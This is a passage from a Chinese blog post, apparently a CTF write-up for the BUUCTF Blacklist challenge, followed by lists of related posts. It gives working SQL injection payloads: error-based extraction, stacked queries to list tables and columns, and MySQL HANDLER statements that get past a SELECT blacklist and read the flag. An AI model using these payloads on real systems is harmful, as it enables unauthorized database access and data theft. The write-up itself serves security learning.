buuctf blacklist
这是一道sql注入题目,我们先来尝试对它进行闭合,payload:1'
使用联合查询,构造payload:
?inject=1' union select 1,2--+
过滤了许多东西:
/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i
其中的select被过滤掉了
尝试使用报错注入进行突破:
?inject=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+
得到数据库:supersqli
由于过滤掉了insert和delete,我们无法使用报错注入,尝试使用堆叠注入进行突破
?inject=-1';use supersqli;show tables--+
发现了两个表,猜测flag在flaghere里面,接下来查字段
?inject=-1';use supersqli;show columns from FlagHere--+
看到了字段flag
用handle读取
这里的handle语句和select查询语句都可以在mysql中查询想要的东西
基本语句是
通过HANDLER tbl_name OPEN打开一张表,无返回结果。
通过HANDLER tbl_name READ FIRST获取tbl_name的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。
通过HANDLER tbl_name CLOSE来关闭打开的tbl_name。
?inject=1';handler FlagHere open;handler FlagHere read first--+
flag{0e61116e-dd99-49ec-ba01-5537cec1a996}
buuctf blacklist相关推荐
- BUUCTF [GYCTF2020] Blacklist
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容: 输入2/2判断注入类型: 回显为2,可以判断出为字符型注入 输入select,查看是否存在回显: re ...
- BUUCTF[GYCTF2020]Blacklist
sql注入题型,测试发现黑名单如下: 大小写,双写,编码均不可绕过. 可用的还有,or and union show 输入:1 or 1=1 无反应 输入:1' or '1' ='1 如下: 字符型注 ...
- Buuctf -web wp汇总(一)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 持续更新ing~ BuuCTF平台 文章目录 BuuCTF平台 [极客大挑战 2019]EasySQL [极 ...
- [GYCTF2020]Blacklist 使用handler函数进行sql堆注入
[GYCTF2020]Blacklist 前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 参 ...
- BUUCTF Web 第二页全部Write ups
更多笔记,可以关注yym68686.top 目录 [强网杯 2019]高明的黑客 [BUUCTF 2018]Online Tool [RoarCTF 2019]Easy Java [GXYCTF201 ...
- BUUCTF的Web真题学习整理(一)
目录 WEB1-WarmUp (任意文件包含漏洞) WEB2-高明的黑客(fuzz脚本) WEB3-easy_tornado (服务端模板注入(ssti攻击)) WEB4-Hack World(时间盲 ...
- BUUCTF寒假刷题-Web
前言 寒假横向刷题(尽量) BUUCTF
- 710. Random Pick with Blacklist - LeetCode
为什么80%的码农都做不了架构师?>>> Question 710. Random Pick with Blacklist Solution 题目大意:给一个N,表示一个范围[ ...
- BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过
BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过 题目 后台PHP源码: <?php include 'config.php'; // FLA ...
最新文章
- 不需要显示地图 就获得用户当前经纬度 超简单的方法
- JVM面试问题系列:JVM 配置常用参数和常用 GC 调优策略
- 页面缓存导致数据错误
- window7下nginx配置文件详解
- Supervised Convolutional Neural Network
- 选择排序、冒泡排序、异或运算
- Spring Boot基础学习笔记08:Spring Boot整合Redis
- 在Jenkins远程链接Linux系统,然后执行shell命令-亲测可用【转】
- CocoStudio基础教程(6)使用CocoStudio编辑帧事件并关联到程序
- python贴吧评论没有权限怎么回事_女朋友总是问我谁好看,只好用python整个评分来回答灵魂拷问!出事就让百度背锅吧!...
- python好用的内置库_python内置的高效好用各种库
- 计算机主机有gpib接口吗,PC104模块与通用并行接口(GPIB)通讯的实现
- 电视机顶盒搜台原理和方法简析
- ElasticSearch学习总结2(基础查询)
- 2019年数学建模美赛经验总结
- html如何根据颜色排序,Excel技巧:按颜色排序或筛选
- 小白程序员应避免的错误
- BZOJ4872 [SHOI2017]分手是祝愿
- 想通过手机刷视频赚钱?这篇文章你有必要了解一下
- 耳机重装系统后服务器坏了,Win7重装后耳机没声音|重装系统后耳机没声音怎么办?...
热门文章
- 解决java.lang.IllegalArgumentException:Property ‘sqlSessionFactory‘ or ‘sqlSessionTemplate‘ are requir
- 1875 丢手绢 约瑟夫环变形 枚举
- Redis学习笔记(附面试题)
- 【Chips】如何启动第一个Quartus/Vivado下的Verilog仿真过程
- 【unity shader】基于UGUI字体的outline优化
- 为何多语临床试验需要专业的翻译公司?
- 优酷youku 1080P 视频下载方法
- Python神笔马良案例集简介
- 若依框架引入外部字体(思源黑体)
- android 進度條_Android ProgressBar 反向進度條/進度條從右到左走